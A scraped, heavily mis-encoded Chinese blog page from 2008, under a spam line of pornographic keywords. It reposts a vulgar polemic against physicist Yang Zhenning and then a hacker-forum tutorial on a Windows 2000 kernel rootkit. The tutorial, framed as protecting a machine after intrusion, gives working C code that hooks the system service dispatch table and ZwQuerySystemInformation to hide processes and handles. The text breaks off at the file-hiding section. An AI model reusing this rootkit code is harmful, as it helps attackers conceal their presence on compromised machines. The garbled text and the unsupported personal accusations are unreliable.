久久天天躁狠狠躁夜夜2020老熟妇,日韩亚洲国产综合久久久,AAA级久久久精品无码片

[转蝲]清华学生怒批杨振宁：不忠不孝不仁不义

saga.constantine — Sun, 15 Jun 2008 17:12:00 GMT

转之前我说几句：
1�Q�本文凤凰网审核通过 link:http://bbs.ifeng.com/viewthread.php?tid=3255187
2, 我也看杨振宁不爽�Q�这么说不犯法吧�?br>a�Q�首先，他不要是自己爱国�Q�不爱国的事都做了就不要再说自己是流的中国的血了�?br>b�Q�其�ơ，选择是�h自己的自由，你有权选择��国�Q�有权选择不回国抗战。那么当然我们鄙视你�Q�骂你，XX你，也是我们的自由，你在��国�q�么多年�Q�应该了解言��q��_��吧�?br>c) 再次�Q�既然你选择了美国，现在��׃��要回来。回来找骂啊。sb。还回来�q�什么？��国��Z��把你当事了，回来扑ֿ�感。上帝怎么没有在美国给你礼物啊�?br>�ȝ��Q�毕竟是在写我自��q��博客�Q�就不怎么用恶心的词了�Q��M��Q�你和现在的中国��球有的一��|��骂谢亚龙的话�Q�，骂你不�ؓ�q��?br>我的自由�a�论完毕。下面请看正文：

清华学生怒批杨振宁：不忠不孝不仁不义
杨振宁自己对自己的评��P��很幸�q�地在每一个选择的关头作了对自己人生最有利的选择。他�q�样一语蔽之，掩盖了其�a�下之意，没有像邓�E�先、钱学森�{��h冒死回国�Q�是自己的幸�q�，因�ؓ�q�样才不会在国内艰苦的环境中早早�q�世�Q��ؓ��国付出毕生�_�֊�而无法��n受国家的富强所提供的优��条件和上帝最后的�C�物�?br>
关于杨振宁�ؓ什么不回国�Q�杨先生的回�{�是�Q�在我之前的中国��ʎ��外求学�Q�都是学成即回国。可是当我拿到博士学位之�Ӟ��韩战爆发�Q�美国不允许理工�U�博士回国，因此滞留在美国。而�ؓ什么加入美国国�c�？杨振宁的回答是因��Z��所持的中华民国护照在出国旅游签证时非常不方便，所以加入美国国�c��?br>
　　杨振宁谎话连��?br>
　　杨振宁说�Q?#8220;在我以前的一些中国留学生�Q�绝大部分都回来了的�Q�所以我到美国去的时候，当时��想是去那儿学成归国。可是我在做博士后的时候，杜鲁门�ȝ��׃��了一道命令，说是中国血�l�的人在��国得了理工的博士学位，不可以回中国。所以我留在��国了�?#8221;　

在这里，我想说出心里觉得很不舒服的几句话�Q�很多当时出国留学的杰出学者，拿的都是博士学位�Q�他们也知道��国不允�总�们回来，可是�Q�国家正遭遇苦难�Q�八�q�抗战、三�q�内战之后中国�h民�ƈ不能完完全全地站立在世界的东方，有一个国家作��Z��界的唯一�怸��Q�不肯放弃在亚洲的势力存在，所以，当摆脱八国联军、摆脱帝国主义铁�y��R略的中华民族正有��Z��一�l�中华板块，而日本作为战败国在亚�z�已奄奄一息无法实现在亚洲的实力制衡之�Ӟ��巧妙插手朝鲜战争�Q�试囑֜�与中国东北接壤的地方建立一个傀儡国�Q�同时牵制中国与日本�Q�也牵制了中国统一台湾的步伐�?br>
也许此时�Q�作为掌握世界先�q�物理科学技术的��尖�U�学�Ӟ��留在世界上最强的国家是一�U?#8220;�q�运”有一整套�U�研环境让其攀��M��界科学高峎ͼ�也有优越的环境，在杨振宁七八�q�后获得��奖卛_��拿到普林斯顿50万美元的�q�薪�Q�可是杨振宁有没有想刎ͼ��Z��么美国在六十�q�代�l�他媲美国际巨星的待遇？��Z��么有同时赴美留学的钱学森与美国抗争一�q�零六个月，历经��国的��Y��折��直到周恩来用朝鲜战争的十名��国战俘把他换回国？��Z��么同样博士学位的邓稼先不��ֽ�时禁止理工科博士回国的禁令一定要回国为国家完成原子弹研究的事业？没有�q�些掌握国际先进�U�研技术的学者回来�ؓ国家打下国防�U�技、核工业的基��Q�中国现在有杨振宁得以��n受的环境吗？

杨振宁回避�ƈ忽略了之前同一批出国留学�h员的贡献�Q�大大炫耀吹嘘自己在美的成��，�q��׃��一代科研�h员走�q�种“有利于自�׃�h生的选择”。对于祖国的认同因�ؓ国家的护照出国旅�怸�方便��抛弃了�Q�他�q�有什么资格在�q�里宣扬自己的成��，更细致入微的比较和自己合作过的科学家在自��q��U�研成果中的投入�Q�媄��李攉K��是那�U�作�?0�Q�的贡献�Q�一定要说自己有70�Q�功劳的那种人�?br>
杨振宁贪婪无耻？

80�q�代�?0�q�代初，国内�q�很�I�L��时候，他不回国�Q?1世纪中国大学都变富了�Q�待遇提高了�Q�他也老得不行了，他才惌��v来自己很“爱国”�Q�自��p��液里“��的是中国�h的血”�Q�简直天大的�W�话�Q?br>
��Z��抬高自己规范场的��C��Q�把和自己合作的�c�_��斯教授说成是所在的俄亥俄大学五十年来所有科学上的论文、无论、生物、数学、化学、还是其它物理学成就�Q�都没有�c�_��斯教授和自己发表的这��论文重要�?br>
以此�c�L��Q�从来没有培育过��奖获得者的清华大学�Q�这一癑֤��q�来所有科研方面的成就�Q�恐怕也没有杨振宁�Q何一��小文章的�A献，所以，他选择80几岁后回国养老，让科研落后的中国见识一下国际��大师�Q�也��怪不得顶着国�h�q�么大的质疑�Q�迎娶一位离婚在职研�I�生�Q�因��Z��他所作出的�A献和人生抉择的成功判断，在�Q何时候都要作出有利于自己的选择�Q�老年回国养老的杨振宁，不选择一位对自己�q�求不矣的年��d��人，�q�能作出什么体现其人生�_�明的判断和价值的呢？

杨振宁这�U�回遉K��点的说法�Q�在��L��人挖�?1�q�回国听到邓�E�先说原子弹是完全靠中国��q��I�做出来的成果时�Q�杨振宁��Z��么落泪的原因�Q�是否因��q��国能作��栯��豪的成就�Q�而作为搞�q�一行、物理研�I�的��尖�U�学�Ӟ��没有为国家尽一份力的遗憾？或是�q�项研究居然��p��q��朋友、童�q�一��h��长一��L��学的邓稼先完成，而感到懊悔呢�Q�杨振宁的回�{�是很多�U�感情参杂在一��P��不是仅仅因�ؓ一�U�原因才止不住落泪�?br>
对于杨振宁这�U�和李政道争执了半个世纪的顶��科学家�Q�他怎么会不在意国家关键性的�U�研成就有没有自��q��参与呢？可是作�ؓ因�ؓ旅游�{�证不方便就把自��q��国籍攑ּ�的一位所谓美�c�华人，他来讲爱国，恐怕台独分子都要�ȝ��Q�试问台湾两千四百万同胞有多��h因�ؓ世界上只有二十个国家承诺中华民国�Q�而与世界上很多国家出现签证麻烦而放弃自��q��中华民国国籍�Q�杨振宁现在�q�用�q�个理由出来�Ԍ��是不是提醒国外留学�h员，当你的中国护照不好用�Q�赶快换一本美国的吧，��他爱国不爱�?#8220;有利于自�?#8221;才是优先考量�?br>
清华在中国的历史上，虽然没有培养��得诺贝奖的国际性科研专�Ӟ��可是为新中国的徏设，做出了扎实而不受政治风气媄响的奉献。无论在国家�U�学、工业、等各方面徏��N��域，都展现着一�U�勤勤恳恟뀁实事求是、中��砥��q��作用。也�怸�国一路走来的国力�Q�还没有条�g作出世界��尖水��^的科学研�IӞ��可是国家各方面发展特别是工科�cȝ��基础和成��，清华培养出来的�h代表一�U�风气、一�U�作风，�q�种风气和作风，是能够在各种政治风�L和潮��中�Q�依然把握国家徏讄��实际工作�Q�哪怕在文革的环境中依然没有让国家的国防�U�研、基��研究停滞或放弃，��Z��国社会民生的发展�Q�做出符合事理的�U�种实干与基本原则�?br>
可是在今天清华园的这�ơ访问中�Q�我觉得很多东西扭曲了。通过暧昧与一脸微�W�的王志�Q�他所惌��又不敢直接讲的那些提问，通过杨振宁得意与自我炫耀的种�U�做法，通过一旁满��与�ƣ喜地参与录��q��帆�Q�我只能��_��中国攚w��开攄��C�会观念冲击真的太大了，大到半个世纪前不��一切回国奉献的老一辈科学家的牺牲都得重新定义与思考了。也讔R��过�q�次的提问，杨振宁会回忆起当�q�他所做出的选择�Q�当�q�听到老朋友原子弹是中国�h自己研究出来的事实那�U�震撹{��可是今天他的选择、清华的选择、翁��姐的选择、都不是那么一回事了�?br>
更确切的定义是：�q�是一�?0多岁�q�回国养老��n受国家特�D�照�儡��伟大��籍华�h�U�学�Ӟ��他��n�Ҏ��他晚�q�上帝所赐与的最后一个礼物，而这个礼物现在也属于��国�Q�清华所做出的巨大投入是��一对美�c�华人在中国的�h值宣扬作全面背书。杨振宁对中国最大的价��g��现是其一生在��M��时候都做出对的选择──当然是对他自己。这个道理也同样适用于翁帆，一�?8岁嫁�l?2岁美�c�华人的�q�轻奛_��。这恐怕是中国�C�会本年度最有社会�h值判断的选择了。而今晚，杨振宁�ؓ�q�一价��D��定，作最完美的解释�?br>
杨振宁的人格

一个�h要想在这样一个清��؜杂的�C�会里干�q�净净地走完自��q��一生，很不�Ҏ��Q�若�q�能奉献全��n心于自己的事业，且能取得伟大的成果，则更难�?br>
中国两弹元勋邓稼先就是干�q�净净地走完了自己一生的人，他因此受��C�h们的喜爱�Q�他又是一个将整个�w�心奉献于自��q��事业的�h�Q�因此赢得�h们的崇敬�Q�他更是一个成��׃��功伟�l�的人，因此使�h们由衷地钦佩和敬仰�?br>
扬振宁和邓稼先是同乡�Q�初中同学，西南联大同学�Q�一起坐船去��国留学。后来两人有着完全不通的价值取向，��C��了完全不通的道�\�Q�扬振宁留在��国�J�华世界�Q�靠获得��儿奖�Q�出��风��_��晚年�q�不甘寂寞！邓稼先当�q�毅然回国，��Z��华民族的两弹一星做��Z��杰出的�A献！可惜的是�׃��当年的科研试验条件有限，��n防护条�g��陋，邓稼先由于核辐射�q�多�Q��n患癌症，英年早逝，实�ؓ国家民族之大�D�！但历史不会忘讎ͼ�人民不会忘记�Q�从历史和国家角度来��_��邓稼先必��千古流芻I��永垂不朽�Q�是他，永远的奠定了整个中华民族的战略安全和民族��C��Q�不��过多少�q�_��所有炎黄子孙都��崇敬他�Q?br>
杨振宁�ؓ中国作了什么�A献？

杨振宁自�׃��ȝ��_��x��惛_��Q�自己对于中国的贡献�Q�顶多也��是自己和李攉K��是华人第一�ơ得��奖�Q�从而改变了中国��׃��如�h的心理。大家看看，�q�就是杨振宁对他�?#8220;�?#8221;的祖国的最大�A献！

在一�ơ爆炸失败后�Q�几个单位在推卸责�Q。�ؓ了找到真正的原因�Q�必��L��人到那颗原子弹被摔碎的地方去�Q�找回一些重要的部�g。邓�E�先��_��“谁也别去�Q�我�q�去吧。你们去了也找不刎ͼ�白受污染。我做的�Q�我知道�?#8221;他一个�h走进了那片地区，那片意味着��M��之地。他很快扑ֈ�了核弹头�Q�用手捧着�Q�走了出来。最后证明是降落伞的问题。就是这一�ơ，伏下了他��M��线之下的死因�?br>
邓稼先有一�ơ开会在西湖�Q�他拉着同仁�?#8220;�_�ֿ�报国”那四个古意盎然的字前照了一张相片。许鹿希��_��邓不��q��相，但这张照片是他自��p��照的。当初随邓稼先一��h��原子弹的�U�学�Ӟ��有些中途而退了。因�?#8220;没有�U�研成果�Q�不能家庭团聚，不许亲友通信。作为知识分子和普通�h的生�z�R��乐��、权益，是必��ȝ��牲掉的了�?br>
杨振宁的不忠不孝不仁不义!

不忠�Q�杨振宁先生在祖国最困难的时候毅然加入美国籍�Q�父亲劝说也无效�Q�不肯归国效力。拿到诺奖的志得意满的杨因�ؓ��C��到长岛的房子耿耿于怀(最后还是屈居在教授��Z��了房�?

不孝�Q�加入美国籍�Q��ؓ此事杨的父亲到死也没有原谅他�Q�是��Z��孝�?br>
不仁:在祖国富强时�Q�又在与某名牌大学的互相�Ҏ��炒作中，回国颐养天年�Q�自从回国以来，东走走、西逛逛，忙着走穴炒作�Q�不愿踏�t�实实做工作�?br>
不义�Q�窃李政道的研究成果�Q�得��奖�Q�还倚老卖老的��名字写在李攉K��的前边，�q�出书丑化李攉K��Q�杜夫�h刚刚�q�世�Q�大一的基��物理刚开课不到半个学期，��׃��心想着上帝的最后一个礼�?..

��x��学位毕业7天，不顾��国��L��毅然回国的邓�E�先�Q��ؓ中国的国防核工业呕心沥血�Q�年�?2虽因攑ְ�性媄响��n患癌症去世�?br>
��x��同道的李攉K��先生早年毅然回国�Q�从70�q�代��P��李政道教授�ؓ中国的教育事业和�U�技术的发展做出了重大的贡献。�ؓ了在中国发展高能物理和徏立高能加速器�Q�后来成为徏立北京正负电子对撞机(BEPC�Q�、北京谱仪和�q�行高能物理实验的骨�qԌ��1982�q�当我国高能物理事业举棋不定的关键时刻，他帮助我国选择了一个既先进又符合国情的BEPC�Ҏ��Q��ƈ成�ؓ当今世界上在c-τ物理研究能区唯一的高亮度电子�Ҏ��机，�q�做��Z��重要的物理结果�?br>
��x��刚刚�q�世的陈省��n先生�Q�生�z�M�P朴、出钱出力、培��d��子、呕心沥血�Q�一心祖国科学事业，真泰山北斗。��n为科学家�Q�应当规范言行，树学��Z��h��Q?br>
从一些以往的传记回忆中�Q�可以得��样一个结论：杨在人品上不及李正道�Q�也不及大多数解攑ֈ�回国的科学家。理由：从年龄上看，李比杨年轻而同时获奖，可以推知李更有创造力�Q�而杨此后却经常纠�~�于论文�|�名的事情，从中国社会传�l�可以知道，大概杨年长处于领导地位，而具体的事情大部分由李来完成�Q�很难想象李不干什么事却去抢年长又�q�许多事的杨的功劻I��Q�奥本�v默也调和不了�?/div>

saga.constantine 2008-06-16 01:12 发表评论

[转蝲]hook��结

saga.constantine — Tue, 10 Jun 2008 13:55:00 GMT

转蝲学习原始出处不详�?因该是是邪恶八进制吧不找�?呵呵

我们安全爱好者，都接触过Rootkit�Q�它�Ҏ��们入侵后的保护提供了强大的支持。现今比较流行的Rootkit有Hxdef�Q�NtRootkit和AFX Rootkit�Q�而且Hxdef和AFX Rootkit�q�提供了源代码，�Ҏ��们的学习提供了很大的方便。这些Rootkit都是使用HOOK技术实现的�Q�欺骗的是用��P��而不是操作系�l�。��用HOOK开发Rootkit是比较简单的�Q�虽然现在也有很多其他的技术，但门槛都太高�Q�很多技术都需要硬�~�码�Q�对于我�{�菜鸟，实在是没有这么高��q��技术。而HOOK��׃��同了�Q�它开发简单，兼容性好�Q�而且它几乎是你在�~�程道�\上的一��必学技术，因�ؓ太多地方需要HOOK了，使用HOOK开发Rootkit不过是其中的一个应用而已�Q�也是学习HOOK的一��Ҏ��较好的实跉|��会。好了，�q�入正题�Q�本文涉及的内容虽然不深�Q�但也需要你有Windows�~�程以及驱动�E�序设计的基��。另外，本文的所有内容均在Windows 2000 SP4下测试成功，如无�Ҏ��提示�Q�所以内定w��是以Windows 2000 SP4、Intel x86为��^��C��l�的�?br>

一、序�a�

针对本文开发的Rootkit�Q�我们常常把它称作Hook System Call、Sysem Service Call或System Service Dispatching�Q�更正规的说法是Hook Windows�pȝ��服务调用�Q�它是系�l�中的一个关键接口，提供了系�l�由用户态切换到内核态的功能。我们知道，一般处理器可以提供从Ring0到Ring3四种处理器模式，其中必须提供2�U�，��是Ring0和Ring3。一些特�D�的处理器指令只能在内核模式执行�Q�一些高端内存也必须在内核模式下才能讉K��Q�可以通过内存映射的方法解冻I��请参考其他文章，本文不做介绍�Q�。Windows�pȝ��是利用了这2个处理器模式�Q�将�pȝ��的关键组件保护�v来，只有在内核模式才可以讉K��Q��ƈ提供了一个上层接口，供用��L��序访问，一切都是在MS的管理之下（悲哀啊！�Q�。下面是Windowx体系�l�构的简略图�?br>

[-------------------Windowx体系�l�构---------------------]
�pȝ��q�程�Q�服务进�E�，应用�E�序�Q�环境子�pȝ��
应用�E�序�~�程接口�Q�API�Q?br>��Z��NTDLL.DLL的本地系�l�服�?br>�Q�用��h��式）
---------------------------------------------------------------
�Q�内核模式）
�pȝ��服务调用�Q�SSDT�Q?br>执行体（Executive�Q?br>�pȝ��内核�Q�设备驱动（Kernel�Q?br>��g抽象层（HAL�Q?br>

二、Windows�pȝ��服务调用

1.机制
Windows 2000的陷��p��度（Trap Dispatching�Q�机制包括了�Q�中断（Interrupt�Q�，延迟�q�程调用�Q�Deferred Procedure Call�Q�，异步�q�程调用�Q�Asynchronous Procedure Call�Q�，异常调度�Q�Exception Dispatching�Q�和�pȝ��服务调用�Q�System Service Call�Q�。在Intel x86�q�_��的Windows 2000使用int 0x2e指��o�q�入Windows�pȝ��服务调用�Q�Windows XP使用sysenter指��o使系�l�陷入系�l�服务调用程序中�Q�而AMD�q�_��的Windows XP�pȝ��使用syscall指��o�q�入Windows�pȝ��服务调用。下面是Intel x86�q�_��的Windows 2000的系�l�服务调用模型�?br>

mov eax, ServiceId
lea edx, ParameterTable
int 2eh
ret ParamTableBytes

其中ServiceId是传递给�pȝ��服务调用�E�序的ID��P��内核使用�q�个ID��h��查找�pȝ��服务调度表（System Service Dispath Table�Q�中的对应系�l�服务信息。在�pȝ��服务调度表中�Q�每一��w��包含了一个指向具体的�pȝ��服务�E�序的指针，我们��是需要HOOK�q�个指针�Q��其指向我们自定义的代码（�E�后会详�q�ͼ�。ParameterTable是传递的参数�Q�系�l�服务调用程序KiSystemService函数会严格检查传递的每一个参敎ͼ��q�将其参��C��U�程的用户内存中复制到系�l�的内存中，以便内核可以讉K��。执行的int指��o会导致陷阱发生，所以Windows 2000内的中断描述表（Interrupt Descriptor Table�Q�中�?x2e指向了系�l�服务调用程序。最后的ParamTableBytes是返回的参数个数的信息�?br>
其实�Q�系�l�服务调用也是一个接口，是面向Windows内核的接口。它实现了将用户模式下的��h��转发到内核模式下�Q��ƈ引发了处理器模式的切换。在用户看来�Q�系�l�服务调用就是与Windows内核通信的一个桥梁�?br>
2.�c�d��
在Windows 2000中默认存在两个系�l�服务调度表�Q�它们对应了两类不同的系�l�服务。这两个�pȝ��服务调度表分别是�Q�KeServiceDescriptorTable和KeServiceDescriptorTableShadow。前者有ntoskrnl.exe导出�Q�后者由Win32k.sys导出。在�pȝ��中，有三个DLL是最重要的：Kernel32.dll、User32.dll和Gdi32.dll�Q�这些DLL导出的函敎ͼ�都是通过某种�c�d��的中断进入内核态，然后调用ntoskrnl.exe或Win32k.sys中的函数。函数KeAddSystemServiceTable允许Win32.sys和其他设备驱动程序添加系�l�服务表。除了Win32k.sys服务表外�Q��用KeAddSystemServiceTable��d��的服务表会被同时复制到KeServiceDescriptorTable和KeServiceDescriptorTableShadow中去�?br>
●注�Q�由于本文的Rootkit只针对KeServiceDescriptorTable�Q�KeServiceDescriptorTableShadow只会�E�微提及一些，不会详述。●

另外在提一下，NTDLL.DLL和ntoskrnl.exe的关�p�d��“微妙”�Q�用��h��和内核态的调用也是有分别的�Q�比如：参数��查。还有Native API导出�?套函敎ͼ�Zw***和Nt***�Q�要惛_��底了解这些内容，推荐看Sunwear写的《浅析本机API》，我们的论坛原创版有这��文�?a target=_blank>http://www.eviloctal.com/forum/index.php�?br>
�l�g��所�q�ͼ�Kernel32.dll/Advapi32.dll�q�入NTDLL.DLL后，使用int 0x2e中断�q�入内核�Q�最后在ntoskrnl.exe中实��C��真正的函数调用；User32.dll和Gdi32.dll则在Win32k.sys中实��C��真正的函数调用�?br>

三、HOOK�pȝ��服务

HOOK�pȝ��服务�Q�首先需要定位系�l�服务调度表�Q�这里需要一个未公开的ntoskrnl.exe导出单元KeServiceDescriptorTable�Q�它对应一个简单的数据�l�构�Q��用它完成对系�l�服务调度表的修攏V�?br>

typedef struct servicetable
{
UINT *ServiceTableBase;
UINT *ServiceCounterTableBase;
UINT NumberOfService;
UCHAR *ParamerterTableBase;
}ServiceDescriptorTableEntry,*PServiceDescriptorTableEntry;

ServiceTableBase指向�pȝ��服务�E�序的地址�Q�我们需要对它进行HOOK�Q��ɘq�个地址指向我们的代码。ParamerterTableBase是参数列表的地址�Q�它们都包含了NumberOfService�q�么多个单元�?br>
我们先用SoftICE分析一下系�l�服务调度表。��用ntcall命��o可以列出�pȝ��中的�pȝ��服务调度表，但不同的�pȝ��Q�不同的SP补丁�Q�系�l�服务调度表肯定是不会相同的�Q�因为MS随时都会修改此表。Ntcall命��o的输出类��D��P��

000A 0008:8049860A params=06 NtAdjustPrivilegesToken

000A是它的序��P��8049860A是其地址�Q�params=06表示�?个参敎ͼ�NtAdjustPrivilegesToken��是函数名了�Q�对应的API是AdjustPrivilegesToken。Win32k.sys导出的系�l�服务调度表位于KeServiceDescriptorTable+50h处，ServiceID�?000h开始，其结构基本和ntoskrnl.exe一栗��我们具体看一下，�׃��SoftICE的输出非常多�Q�这里只节选一��部分�?br>

:dd KeServiceDescriptorTable l 4*4
//如果要查看Win32k.sys�Q�则使用dd KeServiceDescriptorTable+50 l 4*4
0008:8047F7E0 80471128 00000000 000000F8 8047150C ……
……

8047F7E0为KeServiceDescriptorTable的地址�Q?0471128为ServiceTableBase的地址�Q?00000F8为NumberOfService�Q?047150C为ParamerterTableBase�?br>
:dd @KeServiceDescriptorTable l byte(@(KeServiceDescriptorTable+08))*4
0008:80471128 804C3D66 804F7F84 804FADF2 804F7FAE ……
……

80471128地址处�ؓServiceID=0的系�l�服务入口地址。在来看一下参数列表�?br>
:dd @(KeServiceDescriptorTable+0c) l byte(@(KeServiceDescriptorTable+08))
0008:8047150C 2C2C2018 44402C40 0818180C 100C0404 ……
:db @(KeServiceDescriptorTable+0c) l byte(@(KeServiceDescriptorTable+08))
0008:8047150C 18 20 2C 2C 40 2C 40 44 0C 18 18 08 04 04 0C 10 ……

18 20 2C 2C�Q�这里的18表示参数个数�Q�即18h/4=6。根据上面的分析�Q�我们只要修改ServiceTableBase到ServiceTableBase+NumberOfService*4范围的数据就可以改变�pȝ��服务的执行流�E�；修改ServiceID��可以改变这一个系�l�服务的入口地址�Q�我以ZwQuerySystemInformation��Z��说明一下�?br>

:u ZwQuerySystemInformation
ntoskrnl!ZwQuerySystemInformation
0008:8042F288 MOV EAX, 00000097
0008:8042F280 LEA EDX, [ESP+04]
0008:8042F291 INT 2E
0008:8042F293 RET 0010

使用ZwQuerySystemInformation的线性地址+1�Q�就可以定位ServiceID�Q�即入口地址�Q�将�q�个地址指向我们的函敎ͼ��大功告成了。首先需要将KeServiceDescriptorTable引入�Q�这��h��能操作系�l�服务调度表�?br>
__declspec(dllimport) ServiceDescriptorTableEntry KeServiceDescriptorTable;

然后定义一个宏�Q�参数是需要HOOK函数的线性地址�?br>
#define SYSCALL(_Function)
KeServiceDescriptorTable.ServiceTableBase[*(ULONG *)((UCHAR *)_Function+1)]

��_Function+1卛_��定ServiceID的位�|�，卛_��pȝ��服务调度表中的入口地址。有了这个宏�Q�就可以“自由”的将地址指向“��M��”位置�Q�我以ZwQuerySystemInformation��Z��q�行演示。首先定义一个typedef函数指针�Q�用于保存原ZwQuerySystemInformation的地址�?br>

typedef NTSTATUS (*ZWQUERYSYSTEMINFORMATION) (
IN ULONG SystemInformationClass,
……);

声明ZWQUERYSYSTEMINFORMATION OldZwQuerySystemInformation; 然后定义HOOK函数�?br>

NTSTATUS NewZwQuerySystemInformation (
……);

最后还差一个线性地址的函敎ͼ��q�个函数需要遵循DDK函数的调用约定，它什么工作都不做�Q�只是帮助我们得到线性地址�Q�进而在�pȝ��服务调度表中扑ֈ�入口地址�?br>

NTSYSAPI NTSTATUS NTAPI ZwQuerySystemInformation (
……);

万事具备�Q�只�Ơ东风。��用SYSCALL宏保存原函数地址�Q�然后指向新函数�?br>

OldZwQuerySystemInformation=(ZWQUERYSYSTEMINFORMATION)(SYSCALL(ZwQuerySystemInformation)); //保存原函数地址

_asm cli

(ZWQUERYSYSTEMINFORMATION)(SYSCALL(ZwQuerySystemInformation))=NewZwQuerySystemInformation; //指向新函�?br>
_asm sti

�q�原的时候只需��OldZwQuerySystemInformation的地址指向ServiceTableBase卛_��?br>

_asm cli
(ZWQUERYSYSTEMINFORMATION)(SYSCALL(ZwQuerySystemInformation))=OldZwQuerySystemInformation; //�q�原

_asm sti

�q�样��可以HOOK成功了。其实想惻I��不过是��用HOOK函数的线性地址��定在系�l�服务调度表中的入口地址�Q�然后将�q�个入口地址指向新函数或旧函敎ͼ�用SoftICE看看HOOK前后的系�l�服务调度表��明白了�?br>
下面的内容就是具体开发了�Q�包括隐藏进�E�，文�g/目录�Q�端口，注册表，内核模块�Q�服�?驱动�Q�用��P��需要说一下的是，隐藏服务/驱动�Q�用��h��用户态的HOOK�Q�在隐藏服务的章节中�Q�我会介�l�用��h��的HOOK�Q�其他都是在内核下完成的�?br>

四、隐藏进�E?br>

我们�q�_��枚�D�q�程�Q�都是��用HelpTool库、Psapi库中的函敎ͼ��q�些函数最�l�会调用ZwQuerySystemInformation函数�Q�所以只要HOOK�q�个函数�Q�就可以隐藏�q�程�Q��ɾc�M��d��理器这��L��工具不会发现隐藏的进�E�。HOOK的方法前边已�l�说�q�，所以这里只�l�出HOOK后函数的处理代码�Q�很好理解�?br>
首先说说ZwQuerySystemInformation函数�Q��用它可以查询详细的系�l�信息，信息�c�d��多达54�U�，我们在用��h��用的很多查询�pȝ��信息的API�Q�其实最�l�都是调用的它。在�q?4�U�查询类型中�Q�包含进�E�信息的�?个，一个是信息�c�d��?�Q�另一个则�?6�Q�前者�ؓ�pȝ��的进�E�信息，后者�ؓ�pȝ��的句柄表�Q�其中包含进�E�ID。这2个查询信息的�Ҏ��是不同的�Q�所以要分别HOOK。下面是ZwQuerySystemInformation函数的原型�?br>
NTSYSAPI NTSTATUS NTAPI ZwQuerySystemInformation (
IN ULONG SystemInformationClass, //获取的系�l�信息类�?br>IN OUT PVOID SystemInformation, //�q�回的信息指�?br>IN ULONG SystemInforamtionLength, //长度
OUT PULONG ReturnLength OPTIONAL); //实际的缓冲区大小

如果SystemInformationClasss�?�Q�那么SystemInformation会返回下面这个结构�?br>
typedef struct system_porcess
{
ULONG NextEntryDelta; //�q�程偏移
ULONG ThreadCount; //�U�程�?br>ULONG Reserved1[6]; //保留
LARGE_INTEGER CreateTime; //�q�程创徏旉��
LARGE_INTEGER KernelTime; //内核占用旉��
LARGE_INTEGER UserTime; //用户占用旉��
UNICODE_STRING ProcessName; //�q�程�?br>KPRIORITY BasePriority; //优先�U?br>ULONG ProcessId; //�q�程ID
ULONG InheritedProcessId; //父进�E�ID
ULONG HandleCount; //句柄�?br>ULONG Reserved2[2]; //保留
VM_COUNTERS VmCounters; //VM信息
IO_COUNTERS IoCounters; //IO信息
SYSTEM_THREAD SystemThread[1]; //�U�程信息
}SYSTEM_PROCESS,*LPSYSTEM_PROCESS;

如果SystemInformationClasss�?6�Q�则�q�回下面�q�个�l�构�?br>typedef struct system_handle_entry
{
ULONG ProcessId; //�q�程ID
UCHAR ObjectType; //句柄�c�d��
UCHAR Flags; //标志
USHORT HandleValue; //句柄的数�?br>PVOID ObjectPointer; //句柄所指向的内核对象地址
ACCESS_MASK GrantedAccess; //讉K��权限
}SYSTEM_HANDLE_ENTRY,*LPSYSTEM_HANDLE_ENTRY;

typedef struct system_handle_info
{
ULONG Count; //�pȝ��句柄�?br>SYSTEM_HANDLE_ENTRY Handle[1]; //句柄信息
}SYSTEM_HANDLE_INFORMATION,*LPSYSTEM_HANDLE_INFORMATION;

对于信息�c?�Q�我们需要改变NextEntryDelta�l�构成员�Q�它是进�E�列表的偏移地址。比如第一个进�E�信息在SystemInformation+0处，那么�W�二个信息就在SystemInformation+�W�一个NextEntryDelta处，依次�c�L��Q�最后一个进�E�信息的NextEntryDelta��׃ؓ0了。也��是��_��如果要隐藏第一个进�E�，��向前移动缓冲区�Q�移动的长度是第一个进�E�信息结构的大小�Q�如果要隐藏中间的进�E�，则多加一个NextEntryDelta�Q�就可以覆盖掉要隐藏的进�E�信息结构；如果要隐藏最后一个进�E�，��NextEntryDelta讄��?��可以了�?br>
对于信息�c?6�Q�就没有什么偏�U�d��址了，而是一个完整的�~�冲区，我们要隐藏那个句柄，��向前移动SYSTEM_HANDLE_ENTRY�l�构的大��，覆盖掉要隐藏的数据�?br>
NTSTATUS NewZwQuerySystemInformation (
IN ULONG SystemInformationClass,
……)
{
......
//��h��原函�?br>ntStatus=(OldZwQuerySystemInformation)(SystemInformationClass,……);

//SystemInformationClass==16 枚�D�pȝ��句柄�?br>if (NT_SUCCESS(ntStatus) && SystemInformationClass==16)
{
//指向句柄表缓冲区
lpSystemHandle=(LPSYSTEM_HANDLE_INFORMATION)SystemInformation;
Num=lpSystemHandle->Count; //取得�pȝ��句柄�?br>
for (n=0; n{
//比较句柄表中的进�E�ID
if (HIDDEN_SYSTEM_HANDLE==lpSystemHandle->Handle[n].ProcessId)
{
//向前�U�d��句柄表缓冲区
memcpy((lpSystemHandle->Handle+n),(lpSystemHandle->Handle+n+1),
(Num-n-1) * sizeof (SYSTEM_HANDLE_ENTRY));
Num--; //��L��?-
n--;
}
}
}

//SystemInformationClass==5 枚�D�pȝ��q�程
if (NT_SUCCESS(ntStatus) && SystemInformationClass==5)
{
//指向�q�程列表�~�冲�?br>ProcCurr=(LPSYSTEM_PROCESS)SystemInformation;
while (ProcCurr)
{
RtlUnicodeStringToAnsiString(&ProcNameAnsi,&ProcCurr->ProcessName,TRUE);
if (_strnicmp(HIDDEN_SYSTEM_PROCESS,ProcNameAnsi.Buffer,
strlen(ProcNameAnsi.Buffer))==0)
{
//�U�d��q�程偏移NextEntryDelta
if (ProcPrev)
{
if (ProcCurr->NextEntryDelta)
ProcPrev->NextEntryDelta+=ProcCurr->NextEntryDelta;
else
ProcPrev->NextEntryDelta=0;
}
else
{
if (ProcCurr->NextEntryDelta)
SystemInformation=(LPSYSTEM_PROCESS)((TCHAR *)
ProcCurr+ProcCurr->NextEntryDelta);
else
SystemInformation=NULL;
}
}

ProcPrev=ProcCurr;
//下一�q�程
if (ProcCurr->NextEntryDelta)
ProcCurr=(LPSYSTEM_PROCESS)((TCHAR *)
ProcCurr+ProcCurr->NextEntryDelta);
else
ProcCurr=NULL;
}
}

……
return ntStatus;
}

HIDDEN_SYSTEM_HANDLE和HIDDEN_SYSTEM_PROCESS�?个宏�Q�分别�ؓ隐藏的进�E�ID和进�E�名。下面介�l�隐藏文�?目录�?br>

五、隐藏文�?目录

枚�D文�g使用ZwQueryDirectoryFile函数�Q�其原型如下�Q?br>
NTSYSAPI NTSTATUS NTAPI ZwQueryDirectoryFile (
IN HANDLE hFile,
